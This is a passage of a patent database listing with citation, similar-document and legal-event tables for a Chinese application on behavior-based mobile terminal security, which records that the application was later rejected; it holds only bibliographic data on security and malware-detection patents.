| CN103793209A (en) * | 2012-10-26 | 2014-05-14 | 珠海市君天电子科技有限公司 | Method and system for modifying Android program execution flow |
| CN103279708A (en) * | 2012-12-28 | 2013-09-04 | 武汉安天信息技术有限责任公司 | Method and system for monitoring and analyzing mobile terminal malicious code behaviors |
| WO2014106391A1 (en) * | 2013-01-04 | 2014-07-10 | 中兴通讯股份有限公司 | Method, device and system for installing application |
| CN103916434A (en) * | 2013-01-04 | 2014-07-09 | 中兴通讯股份有限公司 | Application installation method, device and system |
| CN103927156A (en) * | 2013-01-16 | 2014-07-16 | 珠海市君天电子科技有限公司 | Sample behavior triggering method and device |
| CN103218566A (en) * | 2013-01-25 | 2013-07-24 | 江南大学 | Active defense system based on Android platform software behavior detection |
| CN103246846A (en) * | 2013-04-24 | 2013-08-14 | 北京网秦天下科技有限公司 | Method and device for detecting safety of customized ROM (read only memory) |
| CN103309790A (en) * | 2013-07-04 | 2013-09-18 | 福建伊时代信息科技股份有限公司 | Method and device for monitoring mobile terminal |
| US10305929B2 (en) | 2013-09-27 | 2019-05-28 | Mcafee, Llc | Managed software remediation |
| CN105683988A (en) * | 2013-09-27 | 2016-06-15 | 迈克菲公司 | Managed software remediation |
| CN103618626A (en) * | 2013-11-28 | 2014-03-05 | 北京奇虎科技有限公司 | Method and system for generating safety analysis report on basis of logs |
| CN104850775A (en) * | 2014-02-14 | 2015-08-19 | 北京奇虎科技有限公司 | Method and device for assessing safety of application program |
| WO2015120756A1 (en) * | 2014-02-14 | 2015-08-20 | 北京奇虎科技有限公司 | Method and device for identifying security of application process |
| CN103942493B (en) * | 2014-03-28 | 2017-02-15 | 北京工业大学 | Intelligent active defensive system and method under Window |
| CN104135479A (en) * | 2014-07-29 | 2014-11-05 | 腾讯科技(深圳)有限公司 | Cloud real-time defense method and system |
| CN105279432B (en) * | 2015-10-12 | 2018-11-23 | 北京金山安全软件有限公司 | Software monitoring processing method and device |
| CN105279432A (en) * | 2015-10-12 | 2016-01-27 | 北京金山安全软件有限公司 | Software monitoring processing method and device |
| CN106055976A (en) * | 2016-05-16 | 2016-10-26 | 杭州华三通信技术有限公司 | Document detection method and sandbox controller |
| CN109614159A (en) * | 2017-09-30 | 2019-04-12 | 北京国双科技有限公司 | Plan target distribution, introduction method and device |
| CN109614159B (en) * | 2017-09-30 | 2022-01-28 | 北京国双科技有限公司 | Method and device for distributing and importing planning tasks |
| CN109726551A (en) * | 2017-10-31 | 2019-05-07 | 武汉安天信息技术有限责任公司 | The methods of exhibiting and system of preceding bad behavior are installed in a kind of application |
| CN109361646A (en) * | 2018-08-23 | 2019-02-19 | 广东电网有限责任公司信息中心 | Network security monitoring and cognitive method in a kind of application of mobile interchange |
| CN109918173A (en) * | 2019-03-06 | 2019-06-21 | 苏州浪潮智能科技有限公司 | Virtual machine health examination method and system based on openstack |
| CN109918173B (en) * | 2019-03-06 | 2021-11-19 | 苏州浪潮智能科技有限公司 | Openstack-based virtual machine health check method and system |
| US10817611B1 (en) | 2019-12-18 | 2020-10-27 | Capital One Services, Llc | Findings remediation management framework system and method |
| CN112099802A (en) * | 2020-09-18 | 2020-12-18 | 腾讯科技(深圳)有限公司 | Component identification method and device of application program |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN102082802A (en) | Behavior-based mobile terminal security protection system and method | |
| US9614863B2 (en) | System and method for analyzing mobile cyber incident | |
| Schmidt et al. | Monitoring smartphones for anomaly detection | |
| CN103716785B (en) | A kind of mobile Internet safety service system | |
| Gelenbe et al. | Security for smart mobile networks: The NEMESYS approach | |
| US20150180908A1 (en) | System and method for whitelisting applications in a mobile network environment | |
| CN112685737A (en) | APP detection method, device, equipment and storage medium | |
| GB2553427A (en) | Identifying and remediating phishing security weaknesses | |
| EP2733656A1 (en) | System and method for enforcing a security policy on mobile devices using dynamically generated security profiles | |
| EP2769324A1 (en) | System and method for whitelisting applications in a mobile network environment | |
| CN103746992B (en) | Based on reverse intruding detection system and method thereof | |
| KR101266037B1 (en) | Method and apparatus for treating malicious action in mobile terminal | |
| CN104246785A (en) | System and method for crowdsourcing of mobile application reputations | |
| WO2017071148A1 (en) | Cloud computing platform-based intelligent defense system | |
| CN106156611A (en) | The dynamic analysing method of smart mobile phone application program and system | |
| CN113177205B (en) | Malicious application detection system and method | |
| CN112513848A (en) | Privacy protected content classification | |
| US11444970B2 (en) | Dynamic security test system | |
| Schmidt | Detection of smartphone malware | |
| US11595436B2 (en) | Rule-based dynamic security test system | |
| Seo et al. | Analysis on maliciousness for mobile applications | |
| Chen et al. | Detection, traceability, and propagation of mobile malware threats | |
| CN109547399A (en) | Wireless network leak analysis method and system | |
| KR101657667B1 (en) | Malicious app categorization apparatus and malicious app categorization method | |
| CN109818972A (en) | A kind of industrial control system information security management method, device and electronic equipment |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| C06 | Publication | ||
| PB01 | Publication | ||
| C10 | Entry into substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| ASS | Succession or assignment of patent right |
Owner name: YANGPUWEIYE TECHNOLOGY LIMITED Free format text: FORMER OWNER: CHEN BIAO Effective date: 20130205 |
|
| C41 | Transfer of patent application or patent right or utility model | ||
| COR | Change of bibliographic data |
Free format text: CORRECT: ADDRESS; FROM: 100027 CHAOYANG, BEIJING TO: 100083 HAIDIAN, BEIJING |
|
| TA01 | Transfer of patent application right |
Effective date of registration: 20130205 Address after: 100083 Beijing City, Haidian District Xueyuan Road No. 30, building A, room 605 days. Applicant after: Yangpuweiye Technology Limited Address before: 100027, room 8, block SOHOA, North Road, workers' Stadium, Chaoyang District, Beijing, Sanlitun 1907, China Applicant before: Chen Biao |
|
| C12 | Rejection of a patent application after its publication | ||
| RJ01 | Rejection of invention patent application after publication |
Application publication date: 20110601 |